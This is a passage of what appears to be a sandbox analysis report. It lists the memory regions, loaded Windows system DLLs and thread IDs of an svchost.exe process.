= 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 977 start_va = 0x590000 end_va = 0x596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 978 start_va = 0x5a0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 979 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 980 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 981 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 982 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 983 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 984 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 985 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 986 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 987 start_va = 0xb20000 end_va = 0xb83fff monitored = 0 entry_point = 0xb35ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 988 start_va = 0xb90000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 989 start_va = 0xba0000 end_va = 0xba6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 990 start_va = 0xc00000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 991 start_va = 0xe00000 end_va = 0xe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 992 start_va = 0xe80000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 993 start_va = 0xf80000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 994 start_va = 0x1000000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 995 start_va = 0x10a0000 end_va = 0x10a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 996 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 997 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 998 start_va = 0x1300000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 999 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1000 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 1001 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 1002 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 1003 start_va = 0x1690000 end_va = 0x178ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 1004 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 1005 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1006 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1007 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1008 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 1009 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1010 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1011 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1012 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1013 start_va = 0x2300000 end_va = 0x2636fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1014 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1015 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1016 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1017 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1018 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1019 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1020 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1021 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1022 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 1023 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1024 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1025 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 1026 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1027 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1028 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1029 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1030 start_va = 0x7ff667160000 end_va = 0x7ff66716cfff monitored = 0 entry_point = 0x7ff667163980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1031 start_va = 0x7ff828310000 end_va = 0x7ff828342fff monitored = 0 entry_point = 0x7ff82831ae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1032 start_va = 0x7ff82c410000 end_va = 0x7ff82c5c7fff monitored = 0 entry_point = 0x7ff82c415550 region_type = mapped_file name = "wmalfxgfxdsp.dll" filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll") Region: id = 1033 start_va = 0x7ff82d810000 end_va = 0x7ff82d897fff monitored = 0 entry_point = 0x7ff82d824510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1034 start_va = 0x7ff837650000 end_va = 0x7ff837663fff monitored = 0 entry_point = 0x7ff837651800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1035 start_va = 0x7ff837670000 end_va = 0x7ff837765fff monitored = 0 entry_point = 0x7ff8376a9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1036 start_va = 0x7ff837cc0000 end_va = 0x7ff837cd0fff monitored = 0 entry_point = 0x7ff837cc2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1037 start_va = 0x7ff839620000 end_va = 0x7ff83969efff monitored = 0 entry_point = 0x7ff839637110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1038 start_va = 0x7ff83b3a0000 end_va = 0x7ff83b3cafff monitored = 0 entry_point = 0x7ff83b3ac3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 1039 start_va = 0x7ff83b3d0000 end_va = 0x7ff83b4dcfff monitored = 0 entry_point = 0x7ff83b3ff420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 1040 start_va = 0x7ff83cbb0000 end_va = 0x7ff83cce5fff monitored = 0 entry_point = 0x7ff83cbdf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1041 start_va = 0x7ff83cee0000 end_va = 0x7ff83ceedfff monitored = 0 entry_point = 0x7ff83cee2e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 1042 start_va = 0x7ff83cf00000 end_va = 0x7ff83cf37fff monitored = 0 entry_point = 0x7ff83cf068f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 1043 start_va = 0x7ff83cf50000 end_va = 0x7ff83cfe8fff monitored = 0 entry_point = 0x7ff83cf6a090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 1044 start_va = 0x7ff83d1f0000 end_va = 0x7ff83d2fafff monitored = 0 entry_point = 0x7ff83d232610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1045 start_va = 0x7ff83d3e0000 end_va = 0x7ff83d3f0fff monitored = 0 entry_point = 0x7ff83d3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1046 start_va = 0x7ff83d570000 end_va = 0x7ff83d582fff monitored = 0 entry_point = 0x7ff83d572760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1047 start_va = 0x7ff83d5c0000 end_va = 0x7ff83d745fff monitored = 0 entry_point = 0x7ff83d60d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1048 start_va = 0x7ff83d750000 end_va = 0x7ff83d7bffff monitored = 0 entry_point = 0x7ff83d772960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1049 start_va = 0x7ff83ddd0000 end_va = 0x7ff83dde9fff monitored = 0 entry_point = 0x7ff83ddd2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1050 start_va = 0x7ff83ddf0000 end_va = 0x7ff83de05fff monitored = 0 entry_point = 0x7ff83ddf19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1051 start_va = 0x7ff83e130000 end_va = 0x7ff83e167fff monitored = 0 entry_point = 0x7ff83e148cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1052 start_va = 0x7ff83f390000 end_va = 0x7ff83f39afff monitored = 0 entry_point = 0x7ff83f391d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1053 start_va = 0x7ff83f3a0000 end_va = 0x7ff83f3e7fff monitored = 0 entry_point = 0x7ff83f3aa1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1054 start_va = 0x7ff83f3f0000 end_va = 0x7ff83f407fff monitored = 0 entry_point = 0x7ff83f3f5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1055 start_va = 0x7ff83f480000 end_va = 0x7ff83f4dcfff monitored = 0 entry_point = 0x7ff83f492bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1056 start_va = 0x7ff83f5c0000 end_va = 0x7ff83f687fff monitored = 0 entry_point = 0x7ff83f6013f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1057 start_va = 0x7ff83f900000 end_va = 0x7ff83fab0fff monitored = 0 entry_point = 0x7ff83f953690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1058 start_va = 0x7ff83fad0000 end_va = 0x7ff83fb19fff monitored = 0 entry_point = 0x7ff83fadac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 1059 start_va = 0x7ff8405d0000 end_va = 0x7ff8405d8fff monitored = 0 entry_point = 0x7ff8405d19a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 1060 start_va = 0x7ff8405e0000 end_va = 0x7ff8405eafff monitored = 0 entry_point = 0x7ff8405e1cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1061 start_va = 0x7ff8413b0000 end_va = 0x7ff8413d6fff monitored = 0 entry_point = 0x7ff8413b7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1062 start_va = 0x7ff8413e0000 end_va = 0x7ff841489fff monitored = 0 entry_point = 0x7ff841407910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1063 start_va = 0x7ff8417f0000 end_va = 0x7ff841821fff monitored = 0 entry_point = 0x7ff841802340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1064 start_va = 0x7ff841970000 end_va = 0x7ff841993fff monitored = 0 entry_point = 0x7ff841973260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1065 start_va = 0x7ff841b10000 end_va = 0x7ff841c03fff monitored = 0 entry_point = 0x7ff841b1a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1066 start_va = 0x7ff841d80000 end_va = 0x7ff841d8bfff monitored = 0 entry_point = 0x7ff841d827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1067 start_va = 0x7ff841e60000 end_va = 0x7ff841e90fff monitored = 0 entry_point = 0x7ff841e67d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1068 start_va = 0x7ff8420d0000 end_va = 0x7ff8420eefff monitored = 0 entry_point = 0x7ff8420d5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1069 start_va = 0x7ff842240000 end_va = 0x7ff84229bfff monitored = 0 entry_point = 0x7ff842256f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1070 start_va = 0x7ff842410000 end_va = 0x7ff84241afff monitored = 0 entry_point = 0x7ff8424119a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1071 start_va = 0x7ff8424a0000 end_va = 0x7ff8424f5fff monitored = 0 entry_point = 0x7ff8424b0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1072 start_va = 0x7ff842650000 end_va = 0x7ff84267cfff monitored = 0 entry_point = 0x7ff842669d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1073 start_va = 0x7ff842800000 end_va = 0x7ff842828fff monitored = 0 entry_point = 0x7ff842814530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1074 start_va = 0x7ff842970000 end_va = 0x7ff8429bafff monitored = 0 entry_point = 0x7ff8429735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1075 start_va = 0x7ff8429c0000 end_va = 0x7ff8429d3fff monitored = 0 entry_point = 0x7ff8429c52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1076 start_va = 0x7ff8429e0000 end_va = 0x7ff8429eefff monitored = 0 entry_point = 0x7ff8429e3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1077 start_va = 0x7ff8429f0000 end_va = 0x7ff8429fffff monitored = 0 entry_point = 0x7ff8429f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1078 start_va = 0x7ff842a00000 end_va = 0x7ff842a69fff monitored = 0 entry_point = 0x7ff842a36d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1079 start_va = 0x7ff842a70000 end_va = 0x7ff842af5fff monitored = 0 entry_point = 0x7ff842a7d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1080 start_va = 0x7ff842b80000 end_va = 0x7ff842d67fff monitored = 0 entry_point = 0x7ff842baba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1081 start_va = 0x7ff842e20000 end_va = 0x7ff842e62fff monitored = 0 entry_point = 0x7ff842e34b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1082 start_va = 0x7ff8434c0000 end_va = 0x7ff843686fff monitored = 0 entry_point = 0x7ff84351db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1083 start_va = 0x7ff844cb0000 end_va = 0x7ff844d5cfff monitored = 0 entry_point = 0x7ff844cc81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1084 start_va = 0x7ff844d60000 end_va = 0x7ff844e7bfff monitored = 0 entry_point = 0x7ff844da02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1085 start_va = 0x7ff844f90000 end_va = 0x7ff8450e5fff monitored = 0 entry_point = 0x7ff844f9a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1086 start_va = 0x7ff845250000 end_va = 0x7ff845257fff monitored = 0 entry_point = 0x7ff845251ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1087 start_va = 0x7ff845260000 end_va = 0x7ff8453e5fff monitored = 0 entry_point = 0x7ff8452affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1088 start_va = 0x7ff845400000 end_va = 0x7ff8454a6fff monitored = 0 entry_point = 0x7ff84540b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1089 start_va = 0x7ff845a10000 end_va = 0x7ff845a6afff monitored = 0 entry_point = 0x7ff845a238b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1090 start_va = 0x7ff845a70000 end_va = 0x7ff845b16fff monitored = 0 entry_point = 0x7ff845a858d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1091 start_va = 0x7ff845b20000 end_va = 0x7ff845be0fff monitored = 0 entry_point = 0x7ff845b40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1092 start_va = 0x7ff845da0000 end_va = 0x7ff845e3cfff monitored = 0 entry_point = 0x7ff845da78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1093 start_va = 0x7ff845e50000 end_va = 0x7ff845ebafff monitored = 0 entry_point = 0x7ff845e690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1094 start_va = 0x7ff845f80000 end_va = 0x7ff8461fcfff monitored = 0 entry_point = 0x7ff846054970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1095 start_va = 0x7ff846200000 end_va = 0x7ff846342fff monitored = 0 entry_point = 0x7ff846228210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1096 start_va = 0x7ff846350000 end_va = 0x7ff846510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1097 start_va = 0xd00000 end_va = 0xdd9fff monitored = 0 entry_point = 0xd33c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 1945 start_va = 0xbb0000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 5661 start_va = 0xbb0000 end_va = 0xbd4fff monitored = 0 entry_point = 0xbbb320 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 5662 start_va = 0x3000000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 5663 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 5681 start_va = 0xbb0000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 5682 start_va = 0xbc0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 5683 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Thread: id = 129 os_tid = 0x12dc Thread: id = 130 os_tid = 0x12d0 Thread: id = 131 os_tid = 0x6c4 Thread: id = 132 os_tid = 0x764 Thread: id = 133 os_tid = 0xebc Thread: id = 134 os_tid = 0xb18 Thread: id = 135 os_tid = 0xab4 Thread: id = 136 os_tid = 0x7bc Thread: id = 137 os_tid = 0x7e4 Thread: id = 138 os_tid = 0x4bc Thread: id = 139 os_tid = 0x498 Thread: id = 140 os_tid = 0x474 Thread: id = 141 os_tid = 0x470 Thread: id = 142 os_tid = 0x180 Thread: id = 143 os_tid = 0x164 Thread: id = 144 os_tid = 0x15c Thread: id = 145 os_tid = 0x160 Thread: id = 146 os_tid = 0x154 Thread: id = 147 os_tid = 0x14c Thread: id = 148 os_tid = 0x100 Thread: id = 149 os_tid = 0x60 Thread: id = 150 os_tid = 0x370 Thread: id = 152 os_tid = 0xfac Thread: id = 164 os_tid = 0xfa0